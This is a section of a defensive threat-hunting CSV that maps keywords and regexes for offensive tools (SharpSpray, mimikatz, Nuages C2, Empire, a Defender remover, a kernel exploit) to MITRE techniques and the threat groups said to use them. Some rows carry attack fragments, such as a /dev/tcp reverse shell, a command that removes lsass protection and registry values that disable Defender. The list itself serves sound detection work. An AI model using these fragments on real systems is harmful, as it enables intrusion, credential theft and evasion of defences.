"* -x -z --get-users-list*",".{0,1000}\s\-x\s\-z\s\-\-get\-users\-list.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","3774"
"* -x -z -s 3 -j 1 -u *.txt*",".{0,1000}\s\-x\s\-z\s\-s\s3\s\-j\s1\s\-u\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","3775"
"* x11-access.nse*",".{0,1000}\sx11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3776"
"* xdmcp-discover.nse*",".{0,1000}\sxdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3777"
"* xmlrpc-methods.nse*",".{0,1000}\sxmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3778"
"* xmpp-brute.nse*",".{0,1000}\sxmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3779"
"* xmpp-info.nse*",".{0,1000}\sxmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3780"
"* xpipe*",".{0,1000}\sxpipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","3782"
"* XRulez.cpp*",".{0,1000}\sXRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","3783"
"* Xworm v*",".{0,1000}XWorm\s(V|v)\d+\.\d+.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","3784"
"* You need to have an elevated context to dump other users' Kerberos tickets :(*",".{0,1000}\sYou\sneed\sto\shave\san\selevated\scontext\sto\sdump\sother\susers\'\sKerberos\stickets\s\:\(.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","3785"
"* Your payload has been delivered*",".{0,1000}\sYour\spayload\shas\sbeen\sdelivered.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3786"
"* -z burplog*",".{0,1000}\s\-z\sburplog.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3787"
"* zsh ddexec.sh*",".{0,1000}\szsh\sddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","3793"
"*! This is a sample loader for Lastenzug*",".{0,1000}!\sThis\sis\sa\ssample\sloader\sfor\sLastenzug.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","3794"
"*!! >> if you did this while in the root shell, the terminal will be messed up << !!*",".{0,1000}!!\s\>\>\sif\syou\sdid\sthis\swhile\sin\sthe\sroot\sshell,\sthe\sterminal\swill\sbe\smessed\sup\s\<\<\s!!.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","3795"
"*!!! Are you sure you are running as the AD FS service account?*",".{0,1000}!!!\sAre\syou\ssure\syou\sare\srunning\sas\sthe\sAD\sFS\sservice\saccount\?.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","3796"
"*!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!*",".{0,1000}!!!\sTHIS\sBACKDOOR\sREQUIRES\sFIREWALL\sEXCEPTION\s!!!.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","3797"
"*!!!need more proxies!!!*",".{0,1000}!!!need\smore\sproxies!!!.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#content","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","3798"
"*!] APC Injection via Syscalls failed!*",".{0,1000}!\]\sAPC\sInjection\svia\sSyscalls\sfailed!.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","3799"
"*!autoruns *",".{0,1000}!autoruns\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3800"
"*!files upload *",".{0,1000}!files\supload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3801"
"*!handlers load *",".{0,1000}!handlers\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3802"
"*!implants *",".{0,1000}!implants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3803"
"*!modules load *",".{0,1000}!modules\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3804"
"*!process 0 0 lsass.exe*",".{0,1000}!process\s0\s0\slsass\.exe.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","3805"
"*!processprotect *lsass.exe*",".{0,1000}!processprotect\s.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","3806"
"*!put */tmp*",".{0,1000}!put\s.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3807"
"*!tunnels --tcp*",".{0,1000}!tunnels\s\-\-tcp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3808"
"*!use *aes256_py*",".{0,1000}!use\s.{0,1000}aes256_py.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3809"
"*!use *reflected_assembly*",".{0,1000}!use\s.{0,1000}reflected_assembly.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","3810"
"*!wPkgPath!*!ak!*",".{0,1000}!wPkgPath!.{0,1000}!ak!.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","3811"
"*""!!Something went wrong. Maybe Outlook is not running.""*",".{0,1000}\""!!Something\swent\swrong\.\sMaybe\sOutlook\sis\snot\srunning\.\"".{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#content","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","3812"
"*""3R<P4*]7ye+jT=,Y%N3v,hrWJ^%qH?a>5L|q[m""*",".{0,1000}\""3R\<P4.{0,1000}\]7ye\+jT\=,Y\%N3v,hrWJ\^\%qH\?a\>5L\|q\[m\"".{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3815"
"*""A La Vie, A L'Amour"" - Windows build *",".{0,1000}\""A\sLa\sVie,\sA\sL\'Amour\""\s\-\sWindows\sbuild\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","3816"
"*""Ace RAT v1.0""*",".{0,1000}\""Ace\sRAT\sv1\.0\"".{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3817"
"*""active_wraith_clients""*",".{0,1000}\""active_wraith_clients\"".{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","3818"
"*""ADWS request with ldapbase (*",".{0,1000}\""ADWS\srequest\swith\sldapbase\s\(.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","3819"
"*""author"": ""@_EthicalChaos_""*",".{0,1000}\""author\""\:\s\""\@_EthicalChaos_\"".{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","3821"
"*""bypass-clm""*",".{0,1000}\""bypass\-clm\"".{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","3823"
"*""-c \""sh -i >& /dev/tcp/*",".{0,1000}\""\-c\s\\\""sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","3824"
"*""Custom DLL's are fking awesome !""*",".{0,1000}\""Custom\sDLL\'s\sare\sfking\sawesome\s!\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3826"
"*""DisableAntiSpyware""=dword:00000001*",".{0,1000}\""DisableAntiSpyware\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3827"
"*""DisableAntiVirus""=dword:00000001*",".{0,1000}\""DisableAntiVirus\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3828"
"*""DisableBehaviorMonitoring""=dword:00000001*",".{0,1000}\""DisableBehaviorMonitoring\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3829"
"*""DisableOnAccessProtection""=dword:00000001*",".{0,1000}\""DisableOnAccessProtection\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3830"
"*""DisableRealtimeMonitoring""=dword:00000001*",".{0,1000}\""DisableRealtimeMonitoring\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3831"
"*""DisableScanOnRealtimeEnable""=dword:00000001*",".{0,1000}\""DisableScanOnRealtimeEnable\""\=dword\:00000001.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","3832"
